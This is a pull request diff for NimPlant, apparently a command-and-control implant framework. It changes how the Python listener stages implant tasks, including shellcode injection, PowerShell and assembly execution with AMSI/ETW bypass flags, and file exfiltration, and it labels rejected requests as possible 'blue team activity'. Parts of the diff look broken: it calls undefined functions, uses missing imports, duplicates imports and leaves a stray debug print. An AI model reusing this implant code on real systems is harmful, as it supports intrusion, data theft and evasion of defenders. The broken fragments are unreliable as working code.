### PR TITLE
Update how task results are decoded & how the upload request for `download` is done

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,8 @@
 __pycache__/
 .vscode
 .xorkey
+*.pem
+*.key
 *.bin
 *.db
 *.dll

--- a/client/commands/download.nim
+++ b/client/commands/download.nim
@@ -42,7 +42,6 @@ proc download*(li : Listener, cmdGuid : string,  args : varargs[string]) : strin
         allowAnyHttpsCertificate: true,
         headers: @[
             Header(key: obf("User-Agent"), value: li.userAgent),
-            Header(key: obf("Content-Encoding"), value: obf("gzip")),
             Header(key: obf("X-Identifier"), value: li.id), # Nimplant ID
             Header(key: obf("X-Unique-ID"), value: cmdGuid)  # Task GUID
         ],

--- a/client/util/webClient.nim
+++ b/client/util/webClient.nim
@@ -137,14 +137,14 @@ proc getQueuedCommand*(li : Listener) : (string, string, seq[string]) =
     else:
         try:
             # Attempt to parse task (parseJson() needs string literal... sigh)
-            var responseData = decryptData(parseJson(res.body)["t"].getStr(), li.cryptKey).replace("\'", "\"")
+            var responseData = decryptData(parseJson(res.body)["t"].getStr(), li.cryptKey).replace("\'", "\\\"")
             var parsedResponseData = parseJson(responseData)
 
             # Get the task and task GUID from the response
             var task = parsedResponseData["task"].getStr()
             cmdGuid = parsedResponseData["guid"].getStr()
 
-            try: 
+            try:
                 # Arguments are included with the task
                 cmd = task.split(' ', 1)[0].toLower()
                 args = parseCmdLine(task.split(' ', 1)[1])

--- a/server/util/commands.py
+++ b/server/util/commands.py
@@ -143,7 +143,7 @@ def handleCommand(raw_command, np=None):
 
         # Handle commands that do not need any server-side handling
         elif cmd in nimplantCmds:
-            guid = np.addTask(raw_command)
+            guid = np.addTask(' '.join(shlex.quote(arg) for arg in [cmd, *args]))
             nimplantPrint(f"Staged command '{raw_command}'.", np.guid, taskGuid=guid)
         else:
             nimplantPrint(

--- a/server/util/func.py
+++ b/server/util/func.py
@@ -499,7 +499,7 @@ def downloadFile(np, args, raw_command):
 
     os.makedirs(os.path.dirname(localPath), exist_ok=True)
     np.receiveFile(localPath)
-    command = f"download {filePath}"
+    command = f"download \"{filePath}\""
 
     guid = np.addTask(command, taskFriendly=raw_command)
     nimplantPrint("Staged download command for NimPlant.", np.guid, taskGuid=guid)

--- a/server/util/func.py
+++ b/server/util/func.py
@@ -1,3 +1,4 @@
+import shlex
 import traceback
 from datetime import datetime
 from struct import pack, calcsize
@@ -219,9 +220,7 @@ def executeAssembly(np, args, raw_command):
     assembly = encryptData(assembly, np.cryptKey)
     assemblyArgs = " ".join(args[k + 1 :])
 
-    commandArgs = " ".join([amsi, etw, assembly, assemblyArgs])
-
-    command = f"execute-assembly {commandArgs}"
+    command = ' '.join(shlex.quote(arg) for arg in ["execute-assembly", amsi, etw, assembly, assemblyArgs])
 
     guid = np.addTask(command, taskFriendly=raw_command)
     nimplantPrint(
@@ -372,8 +371,8 @@ def inlineExecute(np, args, raw_command):
     else:
         assemblyArgs_final = ""
 
-    commandArgs = " ".join([assembly, entryPoint, assemblyArgs_final])
-    command = f"inline-execute {commandArgs}"
+    command = ' '.join(shlex.quote(arg) for arg in ["inline-execute", assembly, entryPoint, assemblyArgs_final])
+
     guid = np.addTask(command, taskFriendly=raw_command)
     nimplantPrint("Staged inline-execute command for NimPlant.", np.guid, taskGuid=guid)
 
@@ -402,9 +401,7 @@ def powershell(np, args, raw_command):
         )
         return
 
-    commandArgs = " ".join([amsi, etw, powershellCmd])
-
-    command = f"powershell {commandArgs}"
+    command = ' '.join(shlex.quote(arg) for arg in ["powershell", amsi, etw, powershellCmd])
 
     guid = np.addTask(command, taskFriendly=raw_command)
     nimplantPrint("Staged powershell command for NimPlant.", np.guid, taskGuid=guid)
@@ -431,9 +428,7 @@ def shinject(np, args, raw_command):
         shellcode = compress(shellcode, level=9)
         shellcode = encryptData(shellcode, np.cryptKey)
 
-        commandArgs = " ".join([processId, shellcode])
-
-        command = f"shinject {commandArgs}"
+        command = ' '.join(shlex.quote(arg) for arg in ["shinject", processId, shellcode])
 
         guid = np.addTask(command, taskFriendly=raw_command)
         nimplantPrint("Staged shinject command for NimPlant.", np.guid, taskGuid=guid)
@@ -467,7 +462,7 @@ def uploadFile(np, args, raw_command):
 
     if os.path.isfile(filePath):
         np.hostFile(filePath)
-        command = f"upload {fileId} {fileName} {remotePath}"
+        command = ' '.join(shlex.quote(arg) for arg in ["upload", fileId, fileName, remotePath])
 
         guid = np.addTask(command, taskFriendly=raw_command)
         nimplantPrint("Staged upload command for NimPlant.", np.guid, taskGuid=guid)
@@ -499,7 +494,8 @@ def downloadFile(np, args, raw_command):
 
     os.makedirs(os.path.dirname(localPath), exist_ok=True)
     np.receiveFile(localPath)
-    command = f"download \"{filePath}\""
+    command = ' '.join(shlex.quote(arg) for arg in ["download", filePath])
+    print(f"Added task is => {command}")
 
     guid = np.addTask(command, taskFriendly=raw_command)
     nimplantPrint("Staged download command for NimPlant.", np.guid, taskGuid=guid)

--- a/server/util/listener.py
+++ b/server/util/listener.py
@@ -14,6 +14,8 @@ import hashlib
 import io
 import json
 
+from .strings import decode_base64_blob
+
 # Parse configuration from 'config.toml'
 try:
     listenerType = config["listener"]["type"]
@@ -284,7 +286,7 @@ def flaskListener(xor_key):
         if np is not None:
             if userAgent == flask.request.headers.get("User-Agent"):
                 res = json.loads(decryptData(data["data"], np.cryptKey))
-                data = base64.b64decode(res["result"]).decode("utf-8")
+                data = decode_base64_blob(res["result"])
 
                 # Handle Base64-encoded, gzipped PNG file (screenshot)
                 if data.startswith("H4sIAAAA"):

--- a/server/util/listener.py
+++ b/server/util/listener.py
@@ -161,7 +161,7 @@ def flaskListener(xor_key):
                 if np.pendingTasks:
                     # There is a task - check in to update 'last seen' and return the task
                     np.checkIn()
-                    task = encryptData(str(np.getNextTask()), np.cryptKey)
+                    task = encryptData(json.dumps(np.getNextTask()), np.cryptKey)
                     return flask.jsonify(t=task), 200
                 else:
                     # There is no task - check in to update 'last seen'

--- a/server/util/listener.py
+++ b/server/util/listener.py
@@ -1,3 +1,4 @@
+from enum import unique, Enum
 from ssl import PROTOCOL_TLSv1, CERT_NONE, PROTOCOL_TLSv1_2
 
 from .config import config
@@ -39,24 +40,47 @@ except KeyError as e:
 app = flask.Flask(__name__)
 ident = decompress(base64.b16decode(b_ident)).decode("utf-8")
 
+
+@unique
+class BadRequestReason(Enum):
+    BAD_KEY = "bad_key"
+    UNKNOWN = "unknown"
+    NO_TASK_GUID = "no_task_id"
+    ID_NOT_FOUND = "id_not_found"
+    NOT_RECEIVING_FILE = "not_receiving_file"
+    NOT_HOSTING_FILE = "not_hosting_file"
+    INCORRECT_FILE_ID = "incorrect_file_id"
+    USER_AGENT_MISMATCH = "user_agent_mismatch"
+
+    def get_explanation(self):
+        explanations = {
+            self.BAD_KEY: "We were unable to process the request. This is likely caused by a XOR key mismatch between NimPlant and server! It could be an old NimPlant that wasn't properly killed or blue team activity.",
+            self.NO_TASK_GUID: "No task GUID was given. This could indicate blue team activity or random internet noise.",
+            self.ID_NOT_FOUND: "The specified NimPlant ID was not found. This could indicate an old NimPlant trying to reconnect, blue team activity, or random internet noise.",
+            self.NOT_RECEIVING_FILE: "We've received an unexpected file upload request from a NimPlant. This could indicate a mismatch between the server and the Nimplant or blue team activity.",
+            self.NOT_HOSTING_FILE: "We've received an unexpected file download request from a NimPlant. This could indicate a mismatch between the server and the Nimplant or blue team activity.",
+            self.INCORRECT_FILE_ID: "The specified file id for upload/download is incorrect. This could indicate a mismatch between the server and the Nimplant or blue team activity.",
+            self.USER_AGENT_MISMATCH: "User-Agent for the request doesn't match the configuration. This could indicate an old NimPlant trying to reconnect, blue team activity, or random internet noise.",
+            self.UNKNOWN: "The reason is unknown."
+        }
+
+        return explanations.get(self, "The reason is unknown.")
+
+
 # Define a function to notify users of unknown or erroneous requests
-def notifyBadRequest(src, method, path, user_agent, reason=None):
-    if reason == "badkey":
-        nimplantPrint(
-            f"Rejected malformed {method} request. This is likely caused by a XOR key mismatch between NimPlant and server! "
-            f"Request from '{src}': {path} ({user_agent})."
-        )
-    else:
-        nimplantPrint(f"Rejected {method} request from '{src}': {path} ({user_agent})")
+def notify_bad_request(request: Request, reason: BadRequestReason = BadRequestReason.UNKNOWN):
+    source = get_external_ip(request)
+    headers = dict(request.headers)
+    user_agent = request.headers.get("User-Agent", "Unknown")
 
+    nimplantPrint(f"Rejected {request.method} request from '{source}': {request.path} ({user_agent})")
+    nimplantPrint(f"Reason: {reason.get_explanation()}")
 
-# Define a utility function to easily get the 'real' IP from a request
-def getExternalIp(request):
-    if request.headers.get("X-Forwarded-For"):
-        return request.access_route[0]
-    else:
-        return request.remote_addr
+    # Printing headers would be useful for checking if we have id or guid definitions.
+    nimplantPrint("Request Headers:")
+    nimplantPrint(json.dumps(headers, ensure_ascii=False))
 
+    pass
 
 # Define Flask listener to run in thread
 def flaskListener(xor_key):
@@ -84,7 +108,7 @@ def flaskListener(xor_key):
                     data = decryptData(data, np.cryptKey)
                     dataJson = json.loads(data)
                     ipAddrInt = dataJson["i"]
-                    ipAddrExt = getExternalIp(flask.request)
+                    ipAddrExt = get_external_ip(flask.request)
                     username = dataJson["u"]
                     hostname = dataJson["h"]
                     osBuild = dataJson["o"]
@@ -111,20 +135,15 @@ def flaskListener(xor_key):
                     return flask.jsonify(status="OK"), 200
 
                 except:
-                    notifyBadRequest(
-                        getExternalIp(flask.request),
-                        flask.request.method,
-                        flask.request.path,
-                        flask.request.headers.get("User-Agent"),
-                        "badkey",
+                    notify_bad_request(
+                        flask.request,
+                        BadRequestReason.BAD_KEY
                     )
                     return flask.jsonify(status="Not found"), 404
         else:
-            notifyBadRequest(
-                getExternalIp(flask.request),
-                flask.request.method,
-                flask.request.path,
-                flask.request.headers.get("User-Agent"),
+            notify_bad_request(
+                flask.request,
+                BadRequestReason.USER_AGENT_MISMATCH
             )
             return flask.jsonify(status="Not found"), 404
 
@@ -135,8 +154,8 @@ def flaskListener(xor_key):
         if np is not None:
             if userAgent == flask.request.headers.get("User-Agent"):
                 # Update the external IP address if it changed
-                if not np.ipAddrExt == getExternalIp(flask.request):
-                    np.ipAddrExt = getExternalIp(flask.request)
+                if not np.ipAddrExt == get_external_ip(flask.request):
+                    np.ipAddrExt = get_external_ip(flask.request)
 
                 if np.pendingTasks:
                     # There is a task - check in to update 'last seen' and return the task
@@ -149,19 +168,15 @@ def flaskListener(xor_key):
                         np.checkIn()
                     return flask.jsonify(status="OK"), 200
             else:
-                notifyBadRequest(
-                    getExternalIp(flask.request),
-                    flask.request.method,
-                    flask.request.path,
-                    flask.request.headers.get("User-Agent"),
+                notify_bad_request(
+                    flask.request,
+                    BadRequestReason.USER_AGENT_MISMATCH
                 )
                 return flask.jsonify(status="Not found"), 404
         else:
-            notifyBadRequest(
-                getExternalIp(flask.request),
-                flask.request.method,
-                flask.request.path,
-                flask.request.headers.get("User-Agent"),
+            notify_bad_request(
+                flask.request,
+                BadRequestReason.ID_NOT_FOUND
             )
             return flask.jsonify(status="Not found"), 404
 
@@ -175,29 +190,39 @@ def flaskListener(xor_key):
                 if (np.hostingFile != None) and (
                     fileId == hashlib.md5(np.hostingFile.encode("utf-8")).hexdigest()
                 ):
+                    taskGuid: Optional[str] = None
+
                     try:
                         # Construct a GZIP stream of the file to upload in-memory
                         # Note: We 'double-compress' here since compression has little use after encryption,
                         #       but we want to present the file as a GZIP stream anyway
                         taskGuid = flask.request.headers.get("X-Unique-ID")
-                        with open(np.hostingFile, mode="rb") as contents:
-                            processedFile = encryptData(
-                                compress(contents.read()), np.cryptKey
+
+                        if taskGuid is not None:
+                            with open(np.hostingFile, mode="rb") as contents:
+                                processedFile = encryptData(
+                                    compress(contents.read()), np.cryptKey
+                                )
+
+                            with io.BytesIO() as data:
+                                with gzip.GzipFile(fileobj=data, mode="wb") as zip:
+                                    zip.write(processedFile.encode("utf-8"))
+                                gzippedResult = data.getvalue()
+
+                            np.stopHostingFile()
+
+                            # Return the GZIP stream as a response
+                            res = flask.make_response(gzippedResult)
+                            res.mimetype = "application/x-gzip"
+                            res.headers["Content-Encoding"] = "gzip"
+                            return res
+                        else:
+                            notify_bad_request(
+                                flask.request,
+                                BadRequestReason.NO_TASK_GUID
                             )
-
-                        with io.BytesIO() as data:
-                            with gzip.GzipFile(fileobj=data, mode="wb") as zip:
-                                zip.write(processedFile.encode("utf-8"))
-                            gzippedResult = data.getvalue()
-
-                        np.stopHostingFile()
-
-                        # Return the GZIP stream as a response
-                        res = flask.make_response(gzippedResult)
-                        res.mimetype = "application/x-gzip"
-                        res.headers["Content-Encoding"] = "gzip"
-                        return res
-
+                            np.stopHostingFile()
+                            return flask.jsonify(status="Not found"), 404
                     except Exception as e:
                         # Error: Could not host the file
                         nimplantPrint(
@@ -209,23 +234,23 @@ def flaskListener(xor_key):
                         return flask.jsonify(status="Not found"), 404
                 else:
                     # Error: The Nimplant is not hosting a file or the file ID is incorrect
+                    notify_bad_request(
+                        flask.request,
+                        BadRequestReason.NOT_HOSTING_FILE if np.hostingFile is None else BadRequestReason.INCORRECT_FILE_ID
+                    )
                     return flask.jsonify(status="OK"), 200
             else:
                 # Error: The user-agent is incorrect
-                notifyBadRequest(
-                    getExternalIp(flask.request),
-                    flask.request.method,
-                    flask.request.path,
-                    flask.request.headers.get("User-Agent"),
+                notify_bad_request(
+                    flask.request,
+                    BadRequestReason.USER_AGENT_MISMATCH
                 )
                 return flask.jsonify(status="Not found"), 404
         else:
             # Error: No Nimplant with the given GUID is currently active
-            notifyBadRequest(
-                getExternalIp(flask.request),
-                flask.request.method,
-                flask.request.path,
-                flask.request.headers.get("User-Agent"),
+            notify_bad_request(
+                flask.request,
+                BadRequestReason.ID_NOT_FOUND
             )
             return flask.jsonify(status="Not found"), 404
 
@@ -236,21 +261,31 @@ def flaskListener(xor_key):
         if np is not None:
             if userAgent == flask.request.headers.get("User-Agent"):
                 if np.receivingFile != None:
+                    taskGuid: Optional[str] = None
+
                     try:
                         taskGuid = flask.request.headers.get("X-Unique-ID")
-                        uncompressed_file = gzip.decompress(
-                            decryptBinaryData(flask.request.data, np.cryptKey)
-                        )
-                        with open(np.receivingFile, "wb") as f:
-                            f.write(uncompressed_file)
-                        nimplantPrint(
-                            f"Successfully downloaded file to '{os.path.abspath(np.receivingFile)}' on NimPlant server.",
-                            np.guid,
-                            taskGuid=taskGuid,
-                        )
+                        if taskGuid is not None:
+                            uncompressed_file = gzip.decompress(
+                                decryptBinaryData(flask.request.data, np.cryptKey)
+                            )
+                            with open(np.receivingFile, "wb") as f:
+                                f.write(uncompressed_file)
+                            nimplantPrint(
+                                f"Successfully downloaded file to '{os.path.abspath(np.receivingFile)}' on NimPlant server.",
+                                np.guid,
+                                taskGuid=taskGuid,
+                            )
 
-                        np.stopReceivingFile()
-                        return flask.jsonify(status="OK"), 200
+                            np.stopReceivingFile()
+                            return flask.jsonify(status="OK"), 200
+                        else:
+                            notify_bad_request(
+                                flask.request,
+                                BadRequestReason.NO_TASK_GUID
+                            )
+                            np.stopReceivingFile()
+                            return flask.jsonify(status="Not found"), 404
                     except Exception as e:
                         nimplantPrint(
                             f"An error occurred while downloading file: {e}",
@@ -260,21 +295,21 @@ def flaskListener(xor_key):
                         np.stopReceivingFile()
                         return flask.jsonify(status="Not found"), 404
                 else:
+                    notify_bad_request(
+                        flask.request,
+                        BadRequestReason.NOT_RECEIVING_FILE
+                    )
                     return flask.jsonify(status="OK"), 200
             else:
-                notifyBadRequest(
-                    getExternalIp(flask.request),
-                    flask.request.method,
-                    flask.request.path,
-                    flask.request.headers.get("User-Agent"),
+                notify_bad_request(
+                    flask.request,
+                    BadRequestReason.USER_AGENT_MISMATCH
                 )
                 return flask.jsonify(status="Not found"), 404
         else:
-            notifyBadRequest(
-                getExternalIp(flask.request),
-                flask.request.method,
-                flask.request.path,
-                flask.request.headers.get("User-Agent"),
+            notify_bad_request(
+                flask.request,
+                BadRequestReason.ID_NOT_FOUND
             )
             return flask.jsonify(status="Not found"), 404
 
@@ -295,27 +330,26 @@ def flaskListener(xor_key):
                 np.setTaskResult(res["guid"], data)
                 return flask.jsonify(status="OK"), 200
             else:
-                notifyBadRequest(
-                    getExternalIp(flask.request),
-                    flask.request.method,
-                    flask.request.path,
-                    flask.request.headers.get("User-Agent"),
+                notify_bad_request(
+                    flask.request,
+                    BadRequestReason.USER_AGENT_MISMATCH
                 )
                 return flask.jsonify(status="Not found"), 404
         else:
-            notifyBadRequest(
-                getExternalIp(flask.request),
-                flask.request.method,
-                flask.request.path,
-                flask.request.headers.get("User-Agent"),
+            notify_bad_request(
+                flask.request,
+                BadRequestReason.ID_NOT_FOUND
             )
             return flask.jsonify(status="Not found"), 404
 
     @app.errorhandler(Exception)
     def all_exception_handler(error):
         nimplantPrint(
-            f"Rejected {flask.request.method} request from '{getExternalIp(flask.request)}' to {flask.request.path} due to error: {error}"
+            f"Rejected {flask.request.method} request from '{get_external_ip(flask.request)}' to {flask.request.path} due to error: {error}"
         )
+
+        dump_debug_info_for_exception(error, flask.request)
+
         return flask.jsonify(status="Not found"), 404
 
     @app.after_request

--- a/server/util/listener.py
+++ b/server/util/listener.py
@@ -1,3 +1,5 @@
+from ssl import PROTOCOL_TLSv1, CERT_NONE, PROTOCOL_TLSv1_2
+
 from .config import config
 from .crypto import *
 from .func import *
@@ -336,6 +338,8 @@ def flaskListener(xor_key):
                 app,
                 keyfile=sslKeyPath,
                 certfile=sslCertPath,
+                ssl_version=PROTOCOL_TLSv1_2,
+                cert_reqs=CERT_NONE,
                 log=None,
             )
             https_server.serve_forever()

--- a/server/util/strings.py
+++ b/server/util/strings.py
@@ -1,0 +1,79 @@
+import base64
+import binascii
+from typing import Optional
+
+# A list of fallback encodings to be used as alternatives when decoding byte streams that fail with UTF-8 encoding.
+# These encodings cover a variety of languages and scripts, providing broad compatibility across different regions.
+FALLBACK_ENCODINGS: list[str] = [
+    # Japanese
+    'shift_jis', 'euc-jp',
+    # Simplified/Traditional Chinese
+    'gbk', 'big5',
+    # Cyrillic
+    'koi8-r', 'koi8-u',
+    # Alternatives for Europe
+    'windows-1252', 'iso-8859-2', 'iso-8859-5', 'iso-8859-7', 'iso-8859-9',
+]
+
+
+def decode_data_blob(data_blob: bytes, fallback_encodings: Optional[list[str]] = None):
+    """
+    Attempts to decode a data blob using UTF-8, then falls back to other specified encodings if UTF-8 decoding fails.
+    The decoded string is then encoded back to UTF-8 to ensure compatibility with UTF-8 only systems.
+
+    Parameters:
+        data_blob (bytes): The byte sequence to decode.
+        fallback_encodings (list of str, optional): A list of encoding names to try if UTF-8 decoding fails.
+
+    Returns:
+        str: The UTF-8 encoded string, regardless of the original encoding.
+
+    Raises:
+        UnicodeDecodeError: If decoding fails for UTF-8 and all specified fallback encodings.
+    """
+
+    decoded_string = None
+
+    if fallback_encodings is None:
+        fallback_encodings = FALLBACK_ENCODINGS
+
+    # Try UTF-8 first, then fallback encodings
+    for encoding in ['utf-8'] + fallback_encodings:
+        try:
+            decoded_string = data_blob.decode(encoding)
+            break  # Stop on the first successful decoding
+        except UnicodeDecodeError:
+            continue
+
+    if decoded_string is None:
+        raise UnicodeDecodeError("Failed to decode data blob with the provided encodings.")
+
+    # Ensure the output is encoded in UTF-8
+    return decoded_string.encode('utf-8').decode('utf-8')
+
+
+def decode_base64_blob(data_base64: str, fallback_encodings: Optional[list[str]] = None):
+    """
+    Decodes data from Base64 encoding to binary, then attempts to decode the binary data using UTF-8.
+    If UTF-8 decoding fails, it tries the specified fallback encodings in order.
+    The final decoded string is ensured to be valid UTF-8.
+
+    Parameters:
+        data_base64 (str): The Base64 encoded string to decode.
+        fallback_encodings (list of str, optional): A list of encoding names to try if UTF-8 decoding fails.
+
+    Returns:
+        str: The decoded string from the original binary data, encoded in UTF-8.
+
+    Raises:
+        ValueError: If the input is not correctly Base64-encoded.
+        UnicodeDecodeError: If decoding fails for UTF-8 and all specified fallback encodings.
+    """
+
+    try:
+        data_blob = base64.b64decode(data_base64)
+    except binascii.Error as e:
+        raise ValueError("Invalid Base64 data") from e
+
+    # Reuse the `decode_data_blob` function to decode the binary data
+    return decode_data_blob(data_blob, fallback_encodings)


### PR DESCRIPTION
This PR fixes two issues, increases the supported certificate version, adds more verbose messaging around errors, and also logs any external IP changes:

1. If `cat` is run on a non-utf8 encoded file, the server won't be able to parse the task results. The approach in this PR uses fallback encodings to see if we can decode the result with any other encodings, and if we can, re-encodes everything with utf8.

For my use cases, `shift_jis` and `euc-jp` are enough. The exact order and number of fallback encodings are up for debate and this could be a config option, so users who don't need the flexibility can disable it.

2. The `download` command gzips and encrypts the target file before uploading it to the server. Since encryption happens after compression, the request content is base64 instead of gzipped bytes. If we have the `Content-Encoding: gzip` header when the content is base64, services such as AWS Lambda where a request is fully parsed before getting passed to the backend, the request will fail with [415 Unsupported Media Type](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/415). Removing the `Content-Encoding: gzip` header fixes this issue.

An alternative would be reversing the compress/encrypt order, but compressing an encrypted blob would yield bigger file sizes.

3. The current server allows https connections from SSLv3 upwards. Rust clients can complain about this, and since we control both server and client, there's no need to support such old methods. This PR updates `ssl_version` to TLS 1.2.

4. Currently, it's difficult to debug why a request was rejected or where an exception occurred. I have increased the verbosity of `all_exception_handler` with a `dump_debug_info_for_exception` method and updated how `notifyBadRequest` works to give better guidance on why a request might have been rejected.

5. Logging changes in external ip address would allow better accounting, since as it is now, we'd only have access to the latest external ip.